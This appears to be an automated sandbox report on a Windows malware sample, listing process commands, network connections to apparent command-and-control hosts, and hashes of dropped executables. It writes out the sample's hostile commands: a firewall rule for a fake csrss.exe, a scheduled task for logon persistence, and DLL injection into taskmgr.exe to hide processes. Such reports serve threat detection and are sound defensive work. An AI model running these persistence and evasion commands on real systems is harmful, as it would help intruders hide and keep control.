C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 8

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -s

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230923193535.log C:\Windows\Logs\CBS\CbsPersist_20230923193535.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.231:80 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.231:80 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.61:80 77.91.68.61 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
FI 77.91.68.78:80 77.91.68.78 tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
US 108.177.126.138:443 accounts.youtube.com tcp
US 108.177.126.138:443 accounts.youtube.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
MD 176.123.9.85:16482 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 61a53309-ea28-4572-9e3f-eefe82e80edb.uuid.zaoshang.ru udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

MD5 f1518566c4c13ed2b8fa03a371d58236
SHA1 32b2404b4c254fe03d3cc2380da6fdbe9969daf1
SHA256 b9cf317745a4cb4c4c7a6a0386e71601e2730b381e8aad5542b879236709d3f8
SHA512 daf82ff5af64149f739c16f8ce98885eb799666600b460e640dd8cebfd6a08b53f48ae125f349cf874fd59a386406ba0d08813cf89bad7a7e7465f472f29d311

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

MD5 f1518566c4c13ed2b8fa03a371d58236
SHA1 32b2404b4c254fe03d3cc2380da6fdbe9969daf1
SHA256 b9cf317745a4cb4c4c7a6a0386e71601e2730b381e8aad5542b879236709d3f8
SHA512 daf82ff5af64149f739c16f8ce98885eb799666600b460e640dd8cebfd6a08b53f48ae125f349cf874fd59a386406ba0d08813cf89bad7a7e7465f472f29d311

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

MD5 f1518566c4c13ed2b8fa03a371d58236
SHA1 32b2404b4c254fe03d3cc2380da6fdbe9969daf1
SHA256 b9cf317745a4cb4c4c7a6a0386e71601e2730b381e8aad5542b879236709d3f8
SHA512 daf82ff5af64149f739c16f8ce98885eb799666600b460e640dd8cebfd6a08b53f48ae125f349cf874fd59a386406ba0d08813cf89bad7a7e7465f472f29d311

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

MD5 f1518566c4c13ed2b8fa03a371d58236
SHA1 32b2404b4c254fe03d3cc2380da6fdbe9969daf1
SHA256 b9cf317745a4cb4c4c7a6a0386e71601e2730b381e8aad5542b879236709d3f8
SHA512 daf82ff5af64149f739c16f8ce98885eb799666600b460e640dd8cebfd6a08b53f48ae125f349cf874fd59a386406ba0d08813cf89bad7a7e7465f472f29d311

\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

MD5 554f3c1cf7539933dde049c3ea8c9f4e
SHA1 262970416d521be21e6466a404e0579d68f32db4
SHA256 c80535bf0713f5311cb705fcf1f766560d22b2c0e9ab6189f285693b45275a2e
SHA512 eb465d8b64fe48740f20a0e7164b088e383f2131bc2d4b8511835da31afef1dc53cc6af04c5fc5653be6db3ac2d8bf713847edc84437232a90a9dadff1976a0a

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

MD5 554f3c1cf7539933dde049c3ea8c9f4e
SHA1 262970416d521be21e6466a404e0579d68f32db4
SHA256 c80535bf0713f5311cb705fcf1f766560d22b2c0e9ab6189f285693b45275a2e
SHA512 eb465d8b64fe48740f20a0e7164b088e383f2131bc2d4b8511835da31afef1dc53cc6af04c5fc5653be6db3ac2d8bf713847edc84437232a90a9dadff1976a0a

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

MD5 554f3c1cf7539933dde049c3ea8c9f4e
SHA1 262970416d521be21e6466a404e0579d68f32db4
SHA256 c80535bf0713f5311cb705fcf1f766560d22b2c0e9ab6189f285693b45275a2e
SHA512 eb465d8b64fe48740f20a0e7164b088e383f2131bc2d4b8511835da31afef1dc53cc6af04c5fc5653be6db3ac2d8bf713847edc84437232a90a9dadff1976a0a

\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

MD5 554f3c1cf7539933dde049c3ea8c9f4e
SHA1 262970416d521be21e6466a404e0579d68f32db4
SHA256 c80535bf0713f5311cb705fcf1f766560d22b2c0e9ab6189f285693b45275a2e
SHA512 eb465d8b64fe48740f20a0e7164b088e383f2131bc2d4b8511835da31afef1dc53cc6af04c5fc5653be6db3ac2d8bf713847edc84437232a90a9dadff1976a0a

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

memory/2756-33-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2756-35-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2756-34-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2756-36-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2756-37-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

MD5 841a12722ea2d8f0398ffaf419c2ef1d
SHA1 3a4670f54e0c6c44fbfc1dc426716f333a2fe34b
SHA256 d10ce2f68a1c250cdfa539a9700000aede03a1064c5df78263418607c603cf07
SHA512 a217385e85f4f6c4b7a72e281a5ba9bd8f19a2fe15974d87f04389b1a539f92ce9ba73b2b3da84d1d88b47a977da68e54bbc155183ae61bbf5b0be55452a4b15

memory/2756-43-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1196-42-0x00000000039D0000-0x00000000039E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3F9F.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\3F9F.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\Cab450D.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar45AD.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1805f2576a03d88c6103f8d9677cf76d
SHA1 22e9ea41a04d025658c0fdd71591e3fe12bd9408
SHA256 e2722abd611fe5f768fd735f7bcb7cd2869c73aec9fc98700835d1d98afd2145
SHA512 086a6819ad5d69e867b2a6494d1cdb016ff0615692afbe17c36d795bd2ad57d72c65d488799b317a1a7bc8d89c6fa9637d1f938a3f4579408551be40817d42c0

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4AC3A911-5A48-11EE-829B-7AF708EF84A9}.dat

MD5 3816f53e57f132818a7e62e071efd179
SHA1 af42c2da8313441513d1996c1ef08d9a833ca452
SHA256 a03073b29a860af3318e6c290846c7372fb8ba72206e1c55326a0a6b8595582c
SHA512 b65ee67664600e1eb66e51663d27a348d48838a43a0b501e977aa0e17ac7cc877becefa490dfc5ff131f32079e5252a3cc7849553a44df1deb002bea34523fe5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8d4441e58ebb3dfa162940c21c3b7f0f
SHA1 44bc131bac06dbc28847d0a10a2c782e31b528fe
SHA256 19905360d3609e0d525b194d8e195fbf91e2f9442e0b9ad0a64e0742616c86f8
SHA512 b822911cf31a6b3d508aac4ed76301ce1d4803019d576b0b1c48b1cfb64e3011cf5a46e276c37554530380e3674180daa3a8b4fc9db547289c1dca40a2287615

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_88B06D18F336F4573DA4CD16EEF01E99

MD5 93ee328029b350497b6cca57716d8656
SHA1 f4e2983125f3adfa4d9da53265559d8aa8b5a2f2
SHA256 2caf1cb0e6c88ca05c0b830ae03ae4d43cbd39becd896aa797a67f4b365e9102
SHA512 419a4f5f54a17c3b553d53ab556a25cf85f0f9448fa169b59bbfb694332868e4c321c35e83fb2c7ef43f8daa12a501a8e1d8cd9e6047ed75cd4b7cc0ed5b85de

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_88B06D18F336F4573DA4CD16EEF01E99

MD5 23ee71f34a80feec27e23d99ecada83e
SHA1 62f4c8dcc03187e2bdcdfa76dc732d4eebde5cc1
SHA256 429bd03ec19810ed389955d166c98e62d9850e52160fbec3dd27da2cc30200fe
SHA512 f5b795c9980fc1b0b499b839ca74cc620451bed3e9c1be9608a5a0f9035bd0839811de0693044b1509455f7c933ae103c7b552852d3aa8420f4a110d6b473a76

C:\Users\Admin\AppData\Local\Temp\5043.exe

MD5 6b254caca548f0be01842a0c4bd4c649
SHA1 79bbeed18d08c3010e8954f6d5c9f52967dcc32e
SHA256 01a7afff3220c1a442e3b8bc41dbf4036e9c223f9aab374265d9beae0709e434
SHA512 b69f8c71f2b71268150cc74e8e842b6526e87c5e944d163bb3def85cc919428c249a733ca9bbefc4cf4b80a8dbf6961b8e6f0333194713faf10551b8eb97d3ff

\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

C:\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

C:\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

\Users\Admin\AppData\Local\Temp\ss41.exe

MD5 2527628a2b3b4343c614e48132ab3edb
SHA1 0d60f573a21251dcfd61d28a7a0566dc29d38aa6
SHA256 04ce968bedd7f177b35e130887aee1ec599e3d7b72f45f370f3ade343950b6bf
SHA512 416b0990011e24ba2d03d3859b63a2b2ba4494aafeb6cd27efd335055ab063bd677902b74faa1162493dae827a96ef768b957f8a407d25902c067a13a8718dd2

memory/1604-419-0x00000000FF290000-0x00000000FF369000-memory.dmp

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

\Users\Admin\AppData\Local\Temp\5524.exe

MD5 ef11a166e73f258d4159c1904485623c
SHA1 bc1f4c685f4ec4f617f79e3f3f8c82564cccfc4e
SHA256 dc24474e1211ef4554c63f4d70380cc71063466c3d0a07e1a4d0726e0f587747
SHA512 2db0b963f92ce1f0b965011f250361e0951702267e8502a7648a726c407941e6b95abb360545e61ff7914c66258ee33a86766b877da3ad4603d68901fbd95708

C:\Users\Admin\AppData\Local\Temp\5524.exe

MD5 ef11a166e73f258d4159c1904485623c
SHA1 bc1f4c685f4ec4f617f79e3f3f8c82564cccfc4e
SHA256 dc24474e1211ef4554c63f4d70380cc71063466c3d0a07e1a4d0726e0f587747
SHA512 2db0b963f92ce1f0b965011f250361e0951702267e8502a7648a726c407941e6b95abb360545e61ff7914c66258ee33a86766b877da3ad4603d68901fbd95708

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\5524.exe

MD5 ef11a166e73f258d4159c1904485623c
SHA1 bc1f4c685f4ec4f617f79e3f3f8c82564cccfc4e
SHA256 dc24474e1211ef4554c63f4d70380cc71063466c3d0a07e1a4d0726e0f587747
SHA512 2db0b963f92ce1f0b965011f250361e0951702267e8502a7648a726c407941e6b95abb360545e61ff7914c66258ee33a86766b877da3ad4603d68901fbd95708

C:\Users\Admin\AppData\Local\Temp\5AFF.exe

MD5 52c2f13a9fa292d1f32439dde355ff71
SHA1 03a9aa82a8070de26b9a347cfbd4090fd239f8df
SHA256 020c6da8f2bbd3a3f15dcbc8808255c2650df37f2b499b680e69d9e3cb1c1316
SHA512 097d5415d7ed0ebb6b6f89cc38b29471a47ef99df79e7c6b0b01592174dfb115abdf496126bb7177527c252803bcc53a31b8c40d2f1aa65fae4331b5afe9e36a

C:\Users\Admin\AppData\Local\Temp\5AFF.exe

MD5 52c2f13a9fa292d1f32439dde355ff71
SHA1 03a9aa82a8070de26b9a347cfbd4090fd239f8df
SHA256 020c6da8f2bbd3a3f15dcbc8808255c2650df37f2b499b680e69d9e3cb1c1316
SHA512 097d5415d7ed0ebb6b6f89cc38b29471a47ef99df79e7c6b0b01592174dfb115abdf496126bb7177527c252803bcc53a31b8c40d2f1aa65fae4331b5afe9e36a

memory/940-550-0x00000000011E0000-0x00000000013B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

C:\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8E7WD55\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

memory/1976-571-0x0000000000240000-0x0000000000326000-memory.dmp

\Users\Admin\AppData\Local\Temp\kos1.exe

MD5 85b698363e74ba3c08fc16297ddc284e
SHA1 171cfea4a82a7365b241f16aebdb2aad29f4f7c0
SHA256 78efcbb0c6eb6a4c76c036adc65154b8ff028849f79d508e45babfb527cb7cfe
SHA512 7e4816c43e0addba088709948e8aedc9e39d6802c74a75cfbc2a0e739b44c5b5eef2bb2453b7032c758b0bdb38e4e7a598aa29be015796361b81d7f9e8027796

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PL78BP4I\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/2116-580-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2116-581-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2116-585-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos1.exe

MD5 85b698363e74ba3c08fc16297ddc284e
SHA1 171cfea4a82a7365b241f16aebdb2aad29f4f7c0
SHA256 78efcbb0c6eb6a4c76c036adc65154b8ff028849f79d508e45babfb527cb7cfe
